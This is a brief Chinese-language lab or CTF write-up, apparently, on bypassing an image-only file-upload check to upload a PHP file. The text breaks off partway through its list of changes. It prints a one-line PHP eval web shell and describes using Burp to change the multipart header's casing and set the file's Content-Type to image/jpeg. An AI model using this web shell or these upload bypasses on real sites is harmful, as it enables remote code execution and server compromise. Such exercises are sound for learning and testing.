打开实验,发现是文件上传
只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件
PHP文件里写入一句话木马
<?php @eval($_POST[caidao]);?>
使用burp抓包,不断尝试发现发现需要修改的地方有三个,一个是http head里的
Content-Type: multipart/form-data;
multipart中的部分字母改成大写的。
第二个是文件的的Content-Type: application/octet-stream,改成image/jpeg
第三个是文件